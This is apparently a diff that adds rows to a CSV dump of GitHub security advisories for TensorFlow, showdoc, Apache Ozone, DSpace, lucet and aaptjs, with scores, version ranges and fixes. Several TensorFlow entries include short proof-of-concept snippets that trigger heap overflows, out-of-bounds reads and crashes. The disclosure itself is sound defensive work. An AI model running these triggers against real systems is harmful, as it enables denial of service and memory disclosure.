+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46911).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2p25-55c9-h58q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41198'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46911'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/9294094df6fea79271778eb7e7ae1bad8b5ef98f'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:53:02Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}"
+1.4.0,GHSA-pjjf-hc4q-g298,2021-11-17T21:11:29Z,2021-11-15T23:16:17Z,,['CVE-2021-3775'],showdoc is vulnerable to Cross-Site Request Forgery (CSRF),showdoc is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.9.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3775'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/67093c879a6563aa6ee08003177777d1975e2351'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/6a59d203-4ca7-4aed-bdb9-1e39b66c77b3'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T20:26:18Z', 'nvd_published_at': '2021-11-13T10:15:00Z'}"
+1.4.0,GHSA-3ff2-r28g-w7h9,2021-11-08T22:21:10Z,2021-11-10T18:57:19Z,,['CVE-2021-41216'],Heap buffer overflow in `Transpose`,"### Impact
+The [shape inference function for `Transpose`](https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc#L121-L185) is vulnerable to a heap buffer overflow:
+
+```python
+import tensorflow as tf
+@tf.function
+def test():
+ y = tf.raw_ops.Transpose(x=[1,2,3,4],perm=[-10])
+ return y
+
+test()
+```
+
+This occurs whenever `perm` contains negative elements. The shape inference function does not validate that the indices in `perm` are all valid:
+
+```cc
+for (int32_t i = 0; i < rank; ++i) {
+ int64_t in_idx = data[i];
+ if (in_idx >= rank) {
+ return errors::InvalidArgument(""perm dim "", in_idx,
+ "" is out of range of input rank "", rank);
+ }
+ dims[i] = c->Dim(input, in_idx);
+}
+```
+
+where `Dim(tensor, index)` accepts either a positive index less than the rank of the tensor or the special value `-1` for unknown dimensions.
+
+### Patches
+We have patched the issue in GitHub commit [c79ba87153ee343401dbe9d1954d7f79e521eb14](https://github.com/tensorflow/tensorflow/commit/c79ba87153ee343401dbe9d1954d7f79e521eb14).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-3ff2-r28g-w7h9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41216'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c79ba87153ee343401dbe9d1954d7f79e521eb14'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/blob/8d72537c6abf5a44103b57b9c2e22c14f5f49698/tensorflow/core/ops/array_ops.cc#L121-L185'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:21:10Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-ff84-84q5-fq4f,2021-11-22T19:05:02Z,2021-11-23T17:56:54Z,,['CVE-2021-39232'],Incorrect Authorization in Apache Ozone,"In Apache Ozone versions prior to 1.2.0, certain admin related SCM commands can be executed by any authenticated users, not just by admins.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39232'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3C3c30a7f2-13a4-345e-6c8a-c23a2b937041%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/3'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T19:05:02Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}"
+1.4.0,GHSA-m4hj-wg2r-qpcr,2021-11-17T21:10:57Z,2021-11-15T23:13:34Z,,['CVE-2021-3776'],showdoc is vulnerable to Cross-Site Request Forgery (CSRF),showdoc is vulnerable to Cross-Site Request Forgery (CSRF).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'showdoc/showdoc'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.12'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3776'}, {'type': 'WEB', 'url': 'https://github.com/star7th/showdoc/commit/67093c879a6563aa6ee08003177777d1975e2351'}, {'type': 'PACKAGE', 'url': 'https://github.com/star7th/showdoc'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/e0edf27d-437e-44fe-907a-df020f385304'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-15T19:41:42Z', 'nvd_published_at': '2021-11-13T10:15:00Z'}"
+1.4.0,GHSA-gh8h-7j2j-qv4f,2021-11-08T22:50:32Z,2021-11-10T19:31:16Z,,['CVE-2021-41200'],Incomplete validation in `tf.summary.create_file_writer`,"### Impact
+If `tf.summary.create_file_writer` is called with non-scalar arguments code crashes due to a `CHECK`-fail.
+
+```python
+import tensorflow as tf
+import numpy as np
+tf.summary.create_file_writer(logdir='', flush_millis=np.ones((1,2)))
+```
+
+### Patches
+We have patched the issue in GitHub commit [874bda09e6702cd50bac90b453b50bcc65b2769e](https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e) (merging [#51715](https://github.com/tensorflow/tensorflow/pull/51715)).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported externally via a [GitHub issue](https://github.com/tensorflow/tensorflow/issues/46909).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-gh8h-7j2j-qv4f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41200'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/issues/46909'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/874bda09e6702cd50bac90b453b50bcc65b2769e'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-617'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T22:50:32Z', 'nvd_published_at': '2021-11-05T20:15:00Z'}"
+1.4.0,GHSA-cf2j-vf36-c6w8,2021-10-29T17:26:35Z,2021-11-01T19:18:16Z,,['CVE-2021-41189'],Communities and collections administrators can escalate their privilege up to system administrator,"### Impact
+Any community or collection administrator can escalate their permission up to become system administrator.
+
+This vulnerability only existed in 7.0 and does not impact 6.x or below.
+
+### Patches
+Fix is included in [7.1](https://github.com/DSpace/DSpace/releases/tag/dspace-7.1). Please upgrade to 7.1 at your earliest convenience.
+
+### Workarounds
+In 7.0, temporarily disable the ability for community or collection administrators to manage permissions or workflows settings, i.e. set the following properties in your local.cfg / dspace.cfg file
+```
+core.authorization.collection-admin.policies = false
+core.authorization.community-admin.policies = false
+core.authorization.community-admin.collection.workflows = false
+```
+Once upgraded to 7.1, these settings can be safely reverted to the default values of `true`.
+
+### References
+Discovered during investigation of https://github.com/DSpace/DSpace/issues/7928
+
+### For more information
+If you have any questions or comments about this advisory:
+* Email us at security@dspace.org
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.dspace:dspace-api'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0'}, {'fixed': '7.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/DSpace/DSpace/security/advisories/GHSA-cf2j-vf36-c6w8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41189'}, {'type': 'WEB', 'url': 'https://github.com/DSpace/DSpace/issues/7928'}, {'type': 'WEB', 'url': 'https://github.com/DSpace/DSpace/commit/277b499a5cd3a4f5eb2370513a1b7e4ec2a6e041'}, {'type': 'WEB', 'url': 'https://github.com/DSpace/DSpace/commit/c3bea16ab911606e15ae96c97a1575e1ffb14f8a'}, {'type': 'PACKAGE', 'url': 'https://github.com/DSpace/DSpace'}]","{'cwe_ids': ['CWE-863'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-29T17:26:35Z', 'nvd_published_at': '2021-10-29T18:15:00Z'}"
+1.4.0,GHSA-hf79-8hjp-rrvq,2021-11-30T22:05:58Z,2021-11-30T22:20:36Z,,['CVE-2021-43790'],Use After Free in lucet,"### Impact
+There is a bug in the main branch of Lucet's `lucet-runtime` that allows a use-after-free in an `Instance` object that could result in memory corruption, data race, or other related issues. This bug was introduced early in the development of Lucet and is present in all releases. As a result of this bug, and dependent on the memory backing for the `Instance` objects, it is possible to trigger a use-after-free when the `Instance` is dropped.
+
+### Patches
+Users should upgrade to the `main` branch of the Lucet repository. Lucet does not provide versioned releases on crates.io.
+
+### Workarounds
+There is no way to remediate this vulnerability without upgrading.
+
+### Description
+Lucet uses a ""pool"" allocator for new WebAssembly instances that are created. This pool allocator manages everything from the linear memory of the wasm instance, the runtime stack for async switching, as well as the memory behind the Instance itself. `Instances` are referred to via an `InstanceHandle` type which will, on drop, release the memory backing the Instance back to the pool.
+
+When an Instance is dropped, the fields of the `Instance` are destructed top-to-bottom, however when the `alloc: Alloc` field is destructed, the memory backing the `Instance` is released back to the pool before the destructors of the remaining fields are run. If another thread allocates the same memory from the pool while these destructors are still running, a race condition occurs that can lead to use-after-free errors.
+
+The bug was corrected by changing how the `InstanceHandle` destructor operates to ensure that the memory backing an Instance is only returned to the pool once the `Instance` has been completely destroyed.
+
+This security advisory has been assigned CVE-2021-43790.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [lucet repository](https://github.com/bytecodealliance/lucet)
+* Email [the lucet team](mailto:lucet@fastly.com)
+* See the [Bytecode Alliance security policy](https://bytecodealliance.org/security)
+","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'lucet-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bytecodealliance/lucet/security/advisories/GHSA-hf79-8hjp-rrvq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-43790'}, {'type': 'WEB', 'url': 'https://github.com/bytecodealliance/lucet/commit/7c7757c772fb709c61b1442bcc1e1fbee97bf4a8'}, {'type': 'WEB', 'url': 'https://crates.io/crates/lucet-runtime'}, {'type': 'PACKAGE', 'url': 'https://github.com/bytecodealliance/lucet'}]","{'cwe_ids': ['CWE-416'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-30T20:56:59Z', 'nvd_published_at': '2021-11-30T00:15:00Z'}"
+1.4.0,GHSA-j8c8-67vp-6mx7,2021-11-08T21:47:47Z,2021-11-10T18:34:49Z,,['CVE-2021-41227'],Arbitrary memory read in `ImmutableConst`,"### Impact
+The `ImmutableConst` operation in TensorFlow can be tricked into reading arbitrary memory contents:
+
+```python
+import tensorflow as tf
+
+with open('/tmp/test','wb') as f:
+ f.write(b'\xe2'*128)
+ data = tf.raw_ops.ImmutableConst(dtype=tf.string,shape=3,memory_region_name='/tmp/test')
+
+print(data)
+```
+
+This is because the `tstring` TensorFlow string class has a special case for memory mapped strings but the operation itself does not offer any support for this datatype.
+
+### Patches
+We have patched the issue in GitHub commit [3712a2d3455e6ccb924daa5724a3652a86f6b585](https://github.com/tensorflow/tensorflow/commit/3712a2d3455e6ccb924daa5724a3652a86f6b585) and GitHub commit [1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b](https://github.com/tensorflow/tensorflow/commit/1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j8c8-67vp-6mx7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41227'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/1cb6bb6c2a6019417c9adaf9e6843ba75ee2580b'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3712a2d3455e6ccb924daa5724a3652a86f6b585'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:47:47Z', 'nvd_published_at': '2021-11-05T23:15:00Z'}"
+1.4.0,GHSA-4g7x-7vgq-3j28,2022-05-04T03:46:28Z,2021-11-02T15:42:16Z,,['CVE-2020-36376'],Vulnerability in list function leads to arbitrary code execution via filePath parameters,"aaptjs is a node wraper for aapt. An issue was discovered in the list function in shenzhim aaptjs 1.3.1, allows attackers to execute arbitrary code via the filePath parameters.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'aaptjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36376'}, {'type': 'WEB', 'url': 'https://github.com/shenzhim/aaptjs/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/shenzhim/aaptjs'}]","{'cwe_ids': ['CWE-77', 'CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-11-01T19:16:41Z', 'nvd_published_at': '2021-10-31T20:15:00Z'}"
+1.4.0,GHSA-rg3m-hqc5-344v,2021-11-08T21:55:57Z,2021-11-10T18:45:55Z,,['CVE-2021-41224'],`SparseFillEmptyRows` heap OOB,"### Impact
+The [implementation](https://github.com/tensorflow/tensorflow/blob/e71b86d47f8bc1816bf54d7bddc4170e47670b97/tensorflow/core/kernels/sparse_fill_empty_rows_op.cc#L194-L241) of `SparseFillEmptyRows` can be made to trigger a heap OOB access:
+
+```python
+import tensorflow as tf
+
+data=tf.raw_ops.SparseFillEmptyRows(
+ indices=[[0,0],[0,0],[0,0]],
+ values=['sssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss'],
+ dense_shape=[5,3],
+ default_value='o')
+```
+
+This occurs whenever the size of `indices` does not match the size of `values`.
+
+### Patches
+We have patched the issue in GitHub commit [67bfd9feeecfb3c61d80f0e46d89c170fbee682b](https://github.com/tensorflow/tensorflow/commit/67bfd9feeecfb3c61d80f0e46d89c170fbee682b).
+
+The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range.
+
+### For more information
+Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.
+
+### Attribution
+This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-rg3m-hqc5-344v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41224'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/67bfd9feeecfb3c61d80f0e46d89c170fbee682b'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-125'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-11-08T21:55:57Z', 'nvd_published_at': '2021-11-05T21:15:00Z'}"
+1.4.0,GHSA-gc37-9g7f-96fx,2022-08-11T18:41:20Z,2021-11-23T18:17:50Z,,['CVE-2021-41532'],"Apache Ozone exposes OM, SCM and Datanode metadata","In Apache Ozone before 1.2.0, Recon HTTP endpoints provide access to OM, SCM and Datanode metadata. Due to a bug, any unauthenticated user can access the data from these endpoints.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.ozone:ozone-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41532'}, {'type': 'WEB', 'url': 'https://mail-archives.apache.org/mod_mbox/ozone-dev/202111.mbox/%3Ce0bc6598-9669-b897-fc28-de8a896e36aa%40apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/11/19/8'}]","{'cwe_ids': ['CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-11-22T18:38:16Z', 'nvd_published_at': '2021-11-19T10:15:00Z'}"
